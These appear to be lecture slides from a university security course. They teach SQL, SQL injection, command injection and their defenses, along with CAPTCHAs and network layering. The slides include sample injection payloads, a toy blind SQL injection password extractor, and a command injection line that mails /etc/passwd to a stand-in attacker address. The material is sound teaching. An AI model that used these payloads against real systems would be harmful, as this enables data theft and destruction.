SQL Injection, CAPTCHAs, and Intro to the Internet

CS 161 Spring 2022 - Lecture 16

Computer Science 161

Nicholas Weaver

Last Time: XSS

  • Websites use untrusted content as control data
    • <html><body>Hello EvanBot!</body></html>
    • <html><body>Hello <script>alert(1)</script>!</body></html>
  • Stored XSS
    • The attacker’s JavaScript is stored on the legitimate server and sent to browsers
    • Classic example: Make a post on a social media site (e.g. Facebook) with JavaScript
  • Reflected XSS
    • The attacker causes the victim to send a request containing JavaScript, and that content is reflected (copied) in the response from the server
    • Classic example: Create a link for a search engine (e.g. Google) query with JavaScript
    • Requires the victim to click on the link with JavaScript

Last Time: XSS Defenses

  • Defense: HTML sanitization
    • Replace control characters with data sequences
      • < becomes &lt;
      • " becomes &quot;
    • Use a trusted library to sanitize inputs for you
  • Defense: Templates
    • Library creates the HTML based on a template and automatically handles all sanitization
  • Defense: Content Security Policy (CSP)
    • Instruct the browser to only use resources loaded from specific places
    • Limits JavaScript: only scripts from trusted sources are run in the browser
    • Enforced by the browser
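
As a rough illustration of the sanitization defense, the sketch below escapes the untrusted name before placing it in the page. It uses Python's standard html.escape as the "trusted library"; the function name render_greeting is an assumption made for this example, not something from the lecture.

```python
import html


def render_greeting(name: str) -> str:
    """Build the greeting page, escaping the untrusted name first."""
    # html.escape turns control characters into data sequences:
    # < becomes &lt;, > becomes &gt;, " becomes &quot;
    safe_name = html.escape(name, quote=True)
    return f"<html><body>Hello {safe_name}!</body></html>"


print(render_greeting("EvanBot"))
print(render_greeting("<script>alert(1)</script>"))
```

With escaping in place, the second call produces a page that displays the script text instead of running it.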

Last Time: Clickjacking

  • Clickjacking: Trick the victim into clicking on something from the attacker
  • Main vulnerability: the browser trusts the user’s clicks
    • When the user clicks on something, the browser assumes the user intended to click there
  • Examples
    • Fake download buttons
    • Show the user one frame, when they’re actually clicking on another invisible frame
    • Temporal attack: Change the cursor just before the user clicks
    • Cursorjacking: Create a fake mouse cursor with JavaScript
  • Defenses
    • Enforce visual integrity: Focus the user’s vision on the relevant part of the screen
    • Enforce temporal integrity: Give the user time to understand what they’re clicking on
    • Ask the user for confirmation
    • Frame-busting: The legitimate website forbids other websites from embedding it in an iframe

Last Time: Phishing

  • Phishing: Trick the victim into sending the attacker personal information
    • A malicious website impersonates a legitimate website to trick the user
  • Don’t blame the users
    • Detecting phishing is hard, especially if you aren’t a security expert
    • Check the URL? Still vulnerable to homograph attacks (malicious URLs that look legitimate)
    • Check the entire browser? Still vulnerable to browser-in-browser attacks
  • Defense: Two-Factor Authentication (2FA)
    • User must prove their identity two different ways (something you know, something you own, something you are)
    • Defends against attacks where an attacker has only stolen one factor (e.g. the password)
    • Vulnerable to relay attacks: The attacker phishes the victim into giving up both factors
    • Vulnerable to social engineering attacks: Trick humans to subvert 2FA
    • Example: Authentication tokens for generating secure two-factor codes
    • Example: Security keys to prevent phishing

Today: SQL Injection and CAPTCHAs

  • Structure of modern web services
  • SQL injection
    • Defenses
  • Command injection
    • Defenses
  • CAPTCHAs
    • Subverting CAPTCHAs

SQL Injection

Top 25 Most Dangerous Software Weaknesses (2020)

  Rank | Score | Name
  -----+-------+------------------------------------------------------------
  [1]  | 46.82 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
  [2]  | 46.17 | Out-of-bounds Write
  [3]  | 33.47 | Improper Input Validation
  [4]  | 26.50 | Out-of-bounds Read
  [5]  | 23.73 | Improper Restriction of Operations within the Bounds of a Memory Buffer
  [6]  | 20.69 | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
  [7]  | 19.16 | Exposure of Sensitive Information to an Unauthorized Actor
  [8]  | 18.87 | Use After Free
  [9]  | 17.29 | Cross-Site Request Forgery (CSRF)
  [10] | 16.44 | Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
  [11] | 15.81 | Integer Overflow or Wraparound
  [12] | 13.67 | Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
  [13] |  8.35 | NULL Pointer Dereference
  [14] |  8.17 | Improper Authentication
  [15] |  7.38 | Unrestricted Upload of File with Dangerous Type
  [16] |  6.95 | Incorrect Permission Assignment for Critical Resource
  [17] |  6.53 | Improper Control of Generation of Code ('Code Injection')

Structure of Web Services

  • Most websites need to store and retrieve data
    • Examples: User accounts, comments, prices, etc.
  • The HTTP server only handles HTTP requests, so it needs some way to store and retrieve persistent data

Structure of Web Services

  • Client: Handle HTML, CSS, JavaScript, etc.
  • Web Server: Process requests and handle server-side logic
  • Database Server: Store and provide access to persistent data
  • Client and Web Server communicate over HTTP
  • Web Server and Database Server communicate over SQL (usually)

  1. User requests page
  2. HTTP GET request
  3. Interpret request
  4. Query database
  5. Return data
  6. Construct response
  7. HTTP response
  8. Browser renders page

Databases

  • For this class, we will cover SQL databases
    • SQL = Structured Query Language
    • Each database has a number of tables
    • Each table has a predefined structure, so it has columns for each field and rows for each entry
  • Database server manages access and storage of these databases

bots (3 rows, 4 columns)

  id | name     | likes    | age
  ---+----------+----------+----
  1  | evanbot  | pancakes | 3
  2  | codabot  | hashes   | 2.5
  3  | pintobot | beans    | 1.5

SQL

  • Structured Query Language (SQL): The language used to interact with and manage data stored in a database
    • Defined by the International Organization for Standardization (ISO) and implemented by many SQL servers
  • Good SQL servers are ACID (atomicity, consistency, isolation, and durability)
    • Essentially ensures that the database will never store a partial operation, return an invalid state, or be vulnerable to race conditions
  • Declarative programming language, rather than imperative
    • Declarative: Use code to define the result you want
    • Imperative: Use code to define exactly what to do (e.g. C, Python, Go)
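
To make the declarative/imperative contrast concrete, here is a small sketch that answers the same question both ways. It assumes Python's built-in sqlite3 module as a stand-in SQL server and reuses the bots rows from the Databases slide; the REAL type for age is an assumption of this example.

```python
import sqlite3

bots = [
    (1, "evanbot", "pancakes", 3.0),
    (2, "codabot", "hashes", 2.5),
    (3, "pintobot", "beans", 1.5),
]

# Imperative: spell out exactly how to walk the data and what to collect.
imperative_names = []
for _id, name, _likes, age in bots:
    if age < 2:
        imperative_names.append(name)

# Declarative: describe the result you want and let the database decide how.
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE bots (id INT, name VARCHAR(255), likes VARCHAR(255), age REAL)")
db.executemany("INSERT INTO bots VALUES (?, ?, ?, ?)", bots)
declarative_names = [row[0] for row in db.execute("SELECT name FROM bots WHERE age < 2")]

print(imperative_names, declarative_names)
```

Both approaches produce the same list; only the SQL version leaves the search strategy to the database.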

Nick’s Thoughts on Databases…

  • CS 186 (Databases) is the one class I regret not taking as an undergraduate...
  • SQL is an incredibly powerful tool for handling large quantities of structured data
    • Hundreds of thousands to billions of records
  • Multiple academic papers started out like this:
    • Throw a billion records in the Postgres database on the big beefy DB server
      • E.g., the results of mapping the infrastructure for 1 billion email spams
    • Write a paper in LaTeX with \result{resultname}
    • Write SQL queries in a Python script to populate the various results
    • Type "make paper" and the paper is made!

SQL: SELECT

  • SELECT is used to select some columns from a table
  • Syntax: SELECT [columns] FROM [table]

bots (3 rows, 4 columns)

  id | name     | likes    | age
  ---+----------+----------+----
  1  | evanbot  | pancakes | 3
  2  | codabot  | hashes   | 2.5
  3  | pintobot | beans    | 1.5

SQL: SELECT

SELECT name, age FROM bots

bots (3 rows, 4 columns)

  id | name     | likes    | age
  ---+----------+----------+----
  1  | evanbot  | pancakes | 3
  2  | codabot  | hashes   | 2.5
  3  | pintobot | beans    | 1.5

Result (3 rows, 2 columns)

  name     | age
  ---------+----
  evanbot  | 3
  codabot  | 2.5
  pintobot | 1.5

Selected 2 columns from the table, keeping all rows.

SQL: SELECT

SELECT * FROM bots

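bots (3 rows, 4 columns)

  id | name     | likes    | age
  ---+----------+----------+----
  1  | evanbot  | pancakes | 3
  2  | codabot  | hashes   | 2.5
  3  | pintobot | beans    | 1.5

Result (3 rows, 4 columns)

  id | name     | likes    | age
  ---+----------+----------+----
  1  | evanbot  | pancakes | 3
  2  | codabot  | hashes   | 2.5
  3  | pintobot | beans    | 1.5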

The asterisk (*) is shorthand for “all columns.” Select all columns from the table, keeping all rows.

SQL: SELECT

SELECT 'CS', '161' FROM bots

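bots (3 rows, 4 columns)

  id | name     | likes    | age
  ---+----------+----------+----
  1  | evanbot  | pancakes | 3
  2  | codabot  | hashes   | 2.5
  3  | pintobot | beans    | 1.5

Result (3 rows, 2 columns; the column names given to constants depend on the database)

  CS | 161
  CS | 161
  CS | 161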

Select constants instead of columns

SQL: WHERE

  • WHERE keeps only the rows that satisfy a condition (all other rows are filtered out)
    • Comparison operators: <, <=, >, >=, =, <> (not equal)
    • Arithmetic operators: +, -, *, /
    • Boolean operators: AND, OR
      • AND has precedence over OR

bots (3 rows, 4 columns)

  id | name     | likes    | age
  ---+----------+----------+----
  1  | evanbot  | pancakes | 3
  2  | codabot  | hashes   | 2.5
  3  | pintobot | beans    | 1.5

SQL: WHERE

SELECT * FROM bots
WHERE likes = 'pancakes'

bots (3 rows, 4 columns)

  id | name     | likes    | age
  ---+----------+----------+----
  1  | evanbot  | pancakes | 3
  2  | codabot  | hashes   | 2.5
  3  | pintobot | beans    | 1.5

Choose only the rows where the likes column has value pancakes

Result (1 row, 4 columns)

  id | name    | likes    | age
  ---+---------+----------+----
  1  | evanbot | pancakes | 3

SQL: WHERE

SELECT name FROM bots
WHERE age < 2 OR id = 1

bots (3 rows, 4 columns)

  id | name     | likes    | age
  ---+----------+----------+----
  1  | evanbot  | pancakes | 3
  2  | codabot  | hashes   | 2.5
  3  | pintobot | beans    | 1.5

Get all names of bots whose age is less than 2 or whose id is 1

Result (2 rows, 1 column)

  name
  ---------
  evanbot   (selected because id is 1)
  pintobot  (selected because age is 1.5)

SQL: INSERT INTO

  • INSERT INTO is used to add rows into a table
  • VALUES is used for defining constant rows and columns, usually to be inserted

bots (3 rows, 4 columns)

  id | name     | likes    | age
  ---+----------+----------+----
  1  | evanbot  | pancakes | 3
  2  | codabot  | hashes   | 2.5
  3  | pintobot | beans    | 1.5

SQL: INSERT INTO

INSERT INTO bots VALUES
(4, 'willow', 'catnip', 5),
(5, 'luna', 'naps', 7)

bots (5 rows, 4 columns)

  id | name     | likes    | age
  ---+----------+----------+----
  1  | evanbot  | pancakes | 3
  2  | codabot  | hashes   | 2.5
  3  | pintobot | beans    | 1.5
  4  | willow   | catnip   | 5
  5  | luna     | naps     | 7

This statement results in two extra rows being added to the table

SQL: UPDATE

  • UPDATE is used to change the values of existing rows in a table
    • Followed by SET after the table name
  • Usually combined with WHERE
  • Syntax:
    UPDATE [table]
    SET [column] = [value]
    WHERE [condition]

bots (5 rows, 4 columns)

  id | name     | likes    | age
  ---+----------+----------+----
  1  | evanbot  | pancakes | 3
  2  | codabot  | hashes   | 2.5
  3  | pintobot | beans    | 1.5
  4  | willow   | catnip   | 5
  5  | luna     | naps     | 7

SQL: UPDATE

UPDATE bots
SET age = 6
WHERE name = 'willow'

bots (5 rows, 4 columns)

  id | name     | likes    | age
  ---+----------+----------+----
  1  | evanbot  | pancakes | 3
  2  | codabot  | hashes   | 2.5
  3  | pintobot | beans    | 1.5
  4  | willow   | catnip   | 6
  5  | luna     | naps     | 7

This statement changes one cell in the table: willow's age goes from 5 to 6. If the WHERE clause were missing, every value in the age column would be set to 6.

SQL: DELETE

  • DELETE FROM is used to delete rows from a table
  • Usually combined with WHERE
  • Syntax:
    DELETE FROM [table]
    WHERE [condition]

bots (5 rows, 4 columns)

  id | name     | likes    | age
  ---+----------+----------+----
  1  | evanbot  | pancakes | 3
  2  | codabot  | hashes   | 2.5
  3  | pintobot | beans    | 1.5
  4  | willow   | catnip   | 6
  5  | luna     | naps     | 7

SQL: DELETE

DELETE FROM bots
WHERE age >= 6

bots (3 rows, 4 columns; the rows for willow, age 6, and luna, age 7, are gone)

  id | name     | likes    | age
  ---+----------+----------+----
  1  | evanbot  | pancakes | 3
  2  | codabot  | hashes   | 2.5
  3  | pintobot | beans    | 1.5

This statement results in two rows being deleted from the table

SQL: CREATE

  • CREATE is used to create tables (and sometimes databases)

bots (3 rows, 4 columns)

  id | name     | likes    | age
  ---+----------+----------+----
  1  | evanbot  | pancakes | 3
  2  | codabot  | hashes   | 2.5
  3  | pintobot | beans    | 1.5

SQL: CREATE

CREATE TABLE cats (
  id INT,
  name VARCHAR(255),
  likes VARCHAR(255),
  age INT
)

bots (3 rows, 4 columns)

  id | name     | likes    | age
  ---+----------+----------+----
  1  | evanbot  | pancakes | 3
  2  | codabot  | hashes   | 2.5
  3  | pintobot | beans    | 1.5

cats (0 rows, 4 columns)

  id | name | likes | age
  ---+------+-------+----

This statement results in a new table being created with the given columns

Note: VARCHAR(255) is a string type

SQL: DROP

  • DROP is used to delete tables (and sometimes databases)
  • Syntax: DROP TABLE [table]

bots (3 rows, 4 columns)

  id | name     | likes    | age
  ---+----------+----------+----
  1  | evanbot  | pancakes | 3
  2  | codabot  | hashes   | 2.5
  3  | pintobot | beans    | 1.5

cats (0 rows, 4 columns)

  id | name | likes | age
  ---+------+-------+----

SQL: DROP

DROP TABLE bots

bots: deleted (0 rows, 0 columns)

cats (0 rows, 4 columns)

  id | name | likes | age
  ---+------+-------+----

This statement results in the entire bots table being deleted
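
The statements from the preceding slides can be replayed end to end. The sketch below assumes Python's built-in sqlite3 module with an in-memory database; the REAL type for the age column is an assumption of this example (the slides do not show how bots was created).

```python
import sqlite3

db = sqlite3.connect(":memory:")

# CREATE: build the bots table (age is REAL here because the slides use 2.5 and 1.5)
db.execute("CREATE TABLE bots (id INT, name VARCHAR(255), likes VARCHAR(255), age REAL)")
db.execute("""INSERT INTO bots VALUES
    (1, 'evanbot', 'pancakes', 3),
    (2, 'codabot', 'hashes', 2.5),
    (3, 'pintobot', 'beans', 1.5)""")

# SELECT ... WHERE: names of bots whose age is less than 2 or whose id is 1
names = db.execute("SELECT name FROM bots WHERE age < 2 OR id = 1").fetchall()

# INSERT INTO: add two rows
db.execute("INSERT INTO bots VALUES (4, 'willow', 'catnip', 5), (5, 'luna', 'naps', 7)")

# UPDATE: change one cell
db.execute("UPDATE bots SET age = 6 WHERE name = 'willow'")
willow_age = db.execute("SELECT age FROM bots WHERE name = 'willow'").fetchone()[0]

# DELETE: remove the rows with age >= 6 (willow and luna)
db.execute("DELETE FROM bots WHERE age >= 6")
remaining = db.execute("SELECT COUNT(*) FROM bots").fetchone()[0]

# DROP: delete the whole table; later queries against it fail
db.execute("DROP TABLE bots")
try:
    db.execute("SELECT * FROM bots")
    table_still_exists = True
except sqlite3.OperationalError:
    table_still_exists = False

print(names, willow_age, remaining, table_still_exists)
```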

SQL: Syntax Characters

  • -- (two dashes) is used for single-line comments (like # in Python or // in C)
  • Semicolons separate different statements:
    • UPDATE items SET price = 2 WHERE id = 4; SELECT price FROM items WHERE id = 4;
  • SQL is really complicated, but you only need to know the basics for this class

A Go HTTP Handler (Again)

Handler:

    func handleGetItems(w http.ResponseWriter, r *http.Request) {
        itemName := r.URL.Query()["item"][0]
        db := getDB()
        // Untrusted input is pasted directly into the SQL string
        query := fmt.Sprintf("SELECT name, price FROM items WHERE name = '%s'", itemName)
        rows, err := db.Query(query)
        ...
    }

URL: https://vulnerable.com/get-items?item=paperclips

Query: SELECT name, price FROM items WHERE name = 'paperclips'

Remember this string manipulation issue?

A Go HTTP Handler (Again)

Handler:

    func handleGetItems(w http.ResponseWriter, r *http.Request) {
        itemName := r.URL.Query()["item"][0]
        db := getDB()
        // Untrusted input is pasted directly into the SQL string
        query := fmt.Sprintf("SELECT name, price FROM items WHERE name = '%s'", itemName)
        rows, err := db.Query(query)
        ...
    }

URL: https://vulnerable.com/get-items?item='

Query: SELECT name, price FROM items WHERE name = '''

The server tries to execute invalid SQL and returns 500 Internal Server Error

A Go HTTP Handler (Again)

Handler:

    func handleGetItems(w http.ResponseWriter, r *http.Request) {
        itemName := r.URL.Query()["item"][0]
        db := getDB()
        // Untrusted input is pasted directly into the SQL string
        query := fmt.Sprintf("SELECT name, price FROM items WHERE name = '%s'", itemName)
        rows, err := db.Query(query)
        ...
    }

URL: https://vulnerable.com/get-items?item=' OR '1' = '1

Query: SELECT name, price FROM items WHERE name = '' OR '1' = '1'

This is essentially OR TRUE, so it returns every item!

A Go HTTP Handler (Again)

Handler:

    func handleGetItems(w http.ResponseWriter, r *http.Request) {
        itemName := r.URL.Query()["item"][0]
        db := getDB()
        // Untrusted input is pasted directly into the SQL string
        query := fmt.Sprintf("SELECT name, price FROM items WHERE name = '%s'", itemName)
        rows, err := db.Query(query)
        ...
    }

URL: https://vulnerable.com/get-items?item='; DROP TABLE items --

Query: SELECT name, price FROM items WHERE name = ''; DROP TABLE items --'

For this payload: End the first quote ('), then start a new statement (DROP TABLE items), then comment out the remaining quote (--)

SQL Injection

  • SQL injection (SQLi): Injecting SQL into queries constructed by the server to cause malicious behavior
    • Typically caused by using vulnerable string manipulation for SQL queries
  • Allows the attacker to execute arbitrary SQL on the SQL server!
    • Leak data
    • Add records
    • Modify records
    • Delete records/tables
    • Basically anything that the SQL server can do
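
The attack can be reproduced locally. The sketch below is a Python analogue of the vulnerable handler, assuming the built-in sqlite3 module and a made-up items table (the item names and prices are invented for the example). It builds the query with string formatting on purpose.

```python
import sqlite3

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE items (name VARCHAR(255), price REAL)")
db.executemany(
    "INSERT INTO items VALUES (?, ?)",
    [("paperclips", 1.5), ("stapler", 12.0), ("secret prototype", 9999.0)],
)


def get_items_vulnerable(item_name: str):
    # Vulnerable on purpose: untrusted input becomes part of the SQL text.
    query = "SELECT name, price FROM items WHERE name = '%s'" % item_name
    return db.execute(query).fetchall()


honest = get_items_vulnerable("paperclips")     # one matching row
leaked = get_items_vulnerable("' OR '1' = '1")  # the OR clause is always true

try:
    get_items_vulnerable("'")                   # a lone quote makes the SQL invalid
    lone_quote_failed = False
except sqlite3.OperationalError:
    lone_quote_failed = True

print(honest, len(leaked), lone_quote_failed)
```

Note that sqlite3's execute refuses to run more than one statement per call, so the DROP TABLE payload would not work against this particular sketch; whether stacked statements run depends on the database driver.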

Exploits of a Mom

Roadside SQLi

Blind SQL Injection

  • Not all SQL queries are used in a way that is visible to the user
    • Visible: Shopping carts, comment threads, list of accounts
    • Blind: Password verification, user account creation
    • Some SQL injection vulnerabilities only return a true/false as a way of determining whether your exploit worked!
  • Blind SQL injection: SQL injection attacks where little to no feedback is provided
    • Attacks become more annoying, but vulnerabilities are still exploitable
    • Automated SQL injection detection and exploitation make the lack of feedback less of an obstacle for attackers
    • Attackers will use automated tools
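
A toy version of a blind attack, to show why a single true/false answer is enough. The sketch assumes Python's built-in sqlite3 module, a made-up users table with a plaintext password (unrealistic, for illustration only), and a password made only of lowercase letters; user_exists and extract_password are hypothetical names.

```python
import sqlite3
import string

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (username VARCHAR(255), password VARCHAR(255))")
db.execute("INSERT INTO users VALUES ('evanbot', 'pancakes')")


def user_exists(username: str) -> bool:
    # Vulnerable on purpose; the caller learns only True or False.
    query = "SELECT 1 FROM users WHERE username = '%s'" % username
    return db.execute(query).fetchone() is not None


def extract_password(target: str, max_len: int = 32) -> str:
    """Recover the password one character at a time from yes/no answers."""
    recovered = ""
    for position in range(1, max_len + 1):
        for guess in string.ascii_lowercase:
            # Injected condition: "is character number `position` equal to `guess`?"
            payload = f"{target}' AND substr(password, {position}, 1) = '{guess}"
            if user_exists(payload):
                recovered += guess
                break
        else:
            return recovered  # no letter matched, so the password has ended
    return recovered


print(extract_password("evanbot"))
```

Each request leaks one yes/no answer, so the attack is slow by hand but trivial to automate.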

Blind SQL Injection Tools

  • sqlmap: An automated tool to find and exploit SQL injection vulnerabilities on web servers
    • Supports pretty much all database systems
    • Supports blind SQL injection (even through timing side channels)
    • Supports “escaping” from the database server to run commands in the operating system itself
  • Takeaway: “Harder” is harder only until someone makes a tool to automate the attack

SQL Injection Defenses

  • Defense: Input sanitization
    • Option #1: Disallow special characters
    • Option #2: Escape special characters
      • Like XSS, SQL injection relies on certain characters that are interpreted specially
      • SQL allows special characters to be escaped so they are treated as data: standard SQL doubles a single quote (''), and some databases (e.g. MySQL) also accept backslash (\) escapes
  • Drawback: Difficult to build a good escaper that handles all edge cases
    • You should never try to build one yourself!
    • Good as a defense-in-depth measure

    func handleGetItems(w http.ResponseWriter, r *http.Request) {
        itemName := r.URL.Query()["item"][0]
        // Escape special characters before building the query
        itemName = sqlEscape(itemName)
        db := getDB()
        query := fmt.Sprintf("SELECT name, price FROM items WHERE name = '%s'", itemName)
        rows, err := db.Query(query)
        ...
    }

SQL Injection Defenses

  • Traditional SQL Processing:
    • Insert user input into SQL query string
    • Parse SQL query string into syntax tree
      • This means that we have to parse user input ⇒ Leads to SQLi vulnerabilities
  • Idea: Don’t insert user input until after parsing is finished
    • We need some way to mark where user input will go without inserting it yet
  • New process:
    • Parse SQL query string into syntax tree
      • If we see a “user input” marker, leave it as a single node in the syntax tree for now
    • Insert user input into SQL syntax tree
      • Now, the parser never even sees the user input!

SQL Injection Defenses

  • Defense: Prepared statements
    • The placeholder for user input is usually written as a question mark (?) in the SQL statement
    • Idea: Parse the SQL first, then insert the data
      • When the parser encounters the ?, it fixes it as a single node in the syntax tree
      • Only after parsing is finished does it insert the data
      • The untrusted input never has a chance to be parsed, only ever treated as data

    func handleGetItems(w http.ResponseWriter, r *http.Request) {
        itemName := r.URL.Query()["item"][0]
        db := getDB()
        // The ? placeholder is filled in with itemName after the SQL is parsed
        rows, err := db.Query("SELECT name, price FROM items WHERE name = ?", itemName)
        ...
    }
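
For comparison, the same idea in a runnable form. This sketch assumes Python's built-in sqlite3 module, which also uses ? as its placeholder, and a made-up items table; get_items is a hypothetical name for this example.

```python
import sqlite3

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE items (name VARCHAR(255), price REAL)")
db.executemany("INSERT INTO items VALUES (?, ?)", [("paperclips", 1.5), ("stapler", 12.0)])


def get_items(item_name: str):
    # The SQL text is fixed; item_name is bound to the ? placeholder as data.
    return db.execute(
        "SELECT name, price FROM items WHERE name = ?", (item_name,)
    ).fetchall()


print(get_items("paperclips"))
print(get_items("' OR '1' = '1"))           # treated as a (nonexistent) item name
print(get_items("'; DROP TABLE items --"))  # likewise just a strange name

item_count = db.execute("SELECT COUNT(*) FROM items").fetchone()[0]
```

Both payloads from the earlier slides simply match no rows, and the items table is untouched.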

SQL Injection Defenses

  • Biggest downside to prepared statements: Not part of the SQL standard!
    • Instead, SQL drivers rely on the actual SQL implementation (e.g. MySQL, PostgreSQL, etc.) to implement prepared statements
  • Must rely on the API to correctly convert the prepared statement into the implementation-specific protocol
    • Again: Consider human factors!

Cat Break

Command Injection

  • Untrusted data being treated incorrectly is not a SQL-specific problem
    • Can happen in other languages too
  • Consider: system function in C
    • The function takes a string as input, spawns a shell, and executes the string input as a command in the shell

system Command Injection

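Handler:

    #include <stdio.h>   /* snprintf */
    #include <stdlib.h>  /* system */

    void find_employee(char *regex) {
        char cmd[512];
        /* Untrusted input is pasted directly into a shell command */
        snprintf(cmd, sizeof cmd, "grep '%s' phonebook.txt", regex);
        system(cmd);
    }

Parameter: regex = "weaver"

system Command: grep 'weaver' phonebook.txt

String manipulation again!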

system Command Injection

Handler:

    #include <stdio.h>   /* snprintf */
    #include <stdlib.h>  /* system */

    void find_employee(char *regex) {
        char cmd[512];
        /* Untrusted input is pasted directly into a shell command */
        snprintf(cmd, sizeof cmd, "grep '%s' phonebook.txt", regex);
        system(cmd);
    }

Parameter: regex = "'; mail mallory@evil.com < /etc/passwd; touch '"

system Command: grep ''; mail mallory@evil.com < /etc/passwd; touch '' phonebook.txt

Defending Against Command Injection in General

  • Defense: Input sanitization
    • As before, this is hard to implement and difficult to get 100% correct
  • Defense: Use safe APIs
    • In general, remember the KISS principle: Keep It Simple, Stupid
    • For system, executing a shell to execute a command is too powerful!
      • Instead, use execv, which directly executes the program with arguments without parsing
    • Most programming languages have safe APIs that should be used instead of parsing untrusted input
      • system (unsafe) and execv (safe) in C
      • os.system (unsafe) and subprocess.run (safe when given an argument list and no shell=True) in Python
      • exec.Command (safe) in Go
        • Go only has the safe version!
        • Say it with me: Consider human factors!
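
A minimal sketch of the safe-API idea in Python. Instead of grep, it launches a child Python process that prints its first argument (a hypothetical stand-in chosen so the example runs anywhere); the point is that subprocess.run with an argument list hands the untrusted string to the program as one argument, with no shell in between.

```python
import subprocess
import sys

# Stand-in for grep (an assumption of this sketch): a child process that
# prints whatever it received as its first argument.
ECHO_ARG = "import sys; print(sys.argv[1])"


def run_with_argument(untrusted: str) -> str:
    # Argument-list form: no shell is spawned, so quotes and semicolons in
    # `untrusted` are never parsed as shell syntax.
    result = subprocess.run(
        [sys.executable, "-c", ECHO_ARG, untrusted],
        capture_output=True,
        text=True,
        check=True,
    )
    return result.stdout.rstrip("\n")


payload = "'; mail mallory@evil.com < /etc/passwd; touch '"
print(run_with_argument(payload))
```

The child process receives the payload verbatim as data; no mail command is ever run.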

Updates to your "Joined an Existing Project" List: Easy things with huge impact

  • Is it in C/C++/Objective C?
    • Turn on all exploit mitigations, and ensure the testing infrastructure includes Valgrind or an equivalent
  • Is it Java or Python?
    • grep for unsafe serialization, and replace it with JSON if possible
  • Does it involve a web site?
    • Consider requiring a modern browser
    • Enable CSP and SameSite cookies
      • Will require some web-page restructuring to remove any inline JavaScript from HTML pages
  • Does it involve a database?
    • grep for all direct SQL, replace with prepared statements
  • Command injection?
    • grep for "system" etc., and replace with safe versions

CAPTCHAs

Websites are for Humans

  • Most websites are designed for human usage, not robot usage
    • Example: A login page is for users to submit their password, not for an attacker to automate a brute-force attack
  • Robot access of websites can lead to attacks
    • Denial of service: Overwhelming a web server by flooding it with requests
      • We’ll see more denial-of-service later in the networking unit
    • Spam
    • More specific exploitation (e.g. scalping tickets/graphics cards when they go on sale)

CAPTCHAs: Definition

  • CAPTCHA: A challenge that is easy for a human to solve, but hard for a computer to solve
    • “Completely Automated Public Turing test to tell Computers and Humans Apart”
    • Sometimes called a “reverse Turing test”
    • Used to distinguish web requests made by humans and web requests made by robots
  • Usage: Administer a CAPTCHA, and if the user passes it, assume that the user is human and allow access

CAPTCHAs: Examples

  • Reading distorted text
  • Identifying images
  • Listening to an audio clip and typing out the words spoken

CAPTCHAs and Machine Learning

  • Modern CAPTCHAs have another purpose: Training machine learning algorithms
    • Machine learning often requires manually-labeled datasets
    • CAPTCHAs crowdsource human power to help manually label these big datasets
    • Example: Machine vision problems require manually-labeled examples: “This is a stop sign”

Takeaway: Modern CAPTCHAs are used to train machine learning algorithms

CAPTCHAs: Issues

  • Arms race: As computer algorithms get smarter, CAPTCHAs need to get harder
  • Accessibility: As CAPTCHAs get harder, not all humans are able to solve them easily
  • Ambiguity: CAPTCHAs might be so hard that the validator doesn’t know the solution either!
  • Not all bots are bad: CAPTCHAs can distinguish bots from humans, but not good bots from bad bots
    • Example: Crawler bots help archive webpages

CAPTCHAs: Attacks

  • Outsourcing attack: Pay humans to solve CAPTCHAs for you
    • CAPTCHAs only verify that there is a human in the loop; everything else can be automated
    • Usually costs a few cents per CAPTCHA
    • CAPTCHAs end up just distinguishing which attackers are willing to spend money
      • Remember: Security is economics!

SQL Injection: Summary

  • Web servers interact with databases to store data
    • Web servers use SQL to interact with databases
  • SQL injection: Untrusted input is used as parsed SQL
    • The attacker can construct their own queries to run on the SQL server!
    • Blind SQL injection: SQLi with little to no feedback from the SQL query
    • Defense: Input sanitization
      • Difficult to implement correctly
    • Defense: Prepared statements
      • Data only ever treated as data; bulletproof!
  • Command injection: Untrusted input is parsed as code in some other language (e.g. a shell command)
    • Defense: Keep it simple and use safe API calls

CAPTCHAs: Summary

  • CAPTCHA: A challenge that is easy for a human to solve, but hard for a computer to solve
    • Examples: Reading distorted text, identifying images
    • Original purpose: Distinguishing between humans and bots
    • Modern purpose: Forces the attacker to spend some money to solve the CAPTCHAs
    • Modern purpose: Providing training data for machine learning algorithms
  • Issues with CAPTCHAs
    • As computer algorithms get smarter, CAPTCHAs get harder, and not all humans are able to solve them easily
    • Ambiguity: CAPTCHAs might be so hard that the validator doesn't know the solution either!
    • Economics: Breaking CAPTCHAs just costs money
    • Not all bots are bad

What’s the Internet?

  • Network: A set of connected machines that can communicate with each other
    • Machines on the network agree on a protocol, a set of rules for communication
  • Internet: A global network of computers
    • The web sends data between browsers and servers using the Internet
    • The Internet can be used for more than the web (e.g. SSH)

Protocols

  • A protocol is an agreement on how to communicate that specifies syntax and semantics
    • Syntax: How a communication is specified and structured (format, order of messages)
    • Semantics: What a communication means (actions taken when sending/receiving messages)
  • Example: Protocol for asking a question in lecture?
    • The student should raise their hand
    • The student should wait to be called on by the speaker or wait for the speaker to pause
    • The student should speak the question after being called on or after waiting
    • If the student has been unrecognized after some time: Vocalize with “Excuse me!”

Layering: The OSI Model

Layering

  • Internet design is partitioned into various layers. Each layer…
    • Has a protocol
    • Relies on services provided by the layer below it
    • Provides services to the layer above it
  • Analogous to the structure of an application and the “services” that each layer relies on and provides

Layers of an application, from top to bottom:

  • Code You Write
  • Run-Time Library
  • System Calls
  • Device Drivers
  • Voltage Levels/Magnetic Domains

Fully isolated from user programs

Example: Sending Mail

Alice sends Bob a message. Each step shows what is being passed along:

  1. The message itself: I am hungry.
  2. Wrapped once: Send to: Bob [ I am hungry. ]
  3. Wrapped again: Mail to: 123 Bob St [ Send to: Bob [ I am hungry. ] ]
  4. Delivered, still wrapped: Mail to: 123 Bob St [ Send to: Bob [ I am hungry. ] ]
  5. Outer wrapper removed: Send to: Bob [ I am hungry. ]
  6. Inner wrapper removed, Bob reads: I am hungry.

Each layer communicates with its counterpart on the other side, relying on the abstractions below it!

  • Alice and Bob rely upon: Sending messages to people
  • The layer below provides: Sending messages to people
    • It relies upon: Sending messages to addresses
  • The layer below that provides: Sending messages to addresses
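
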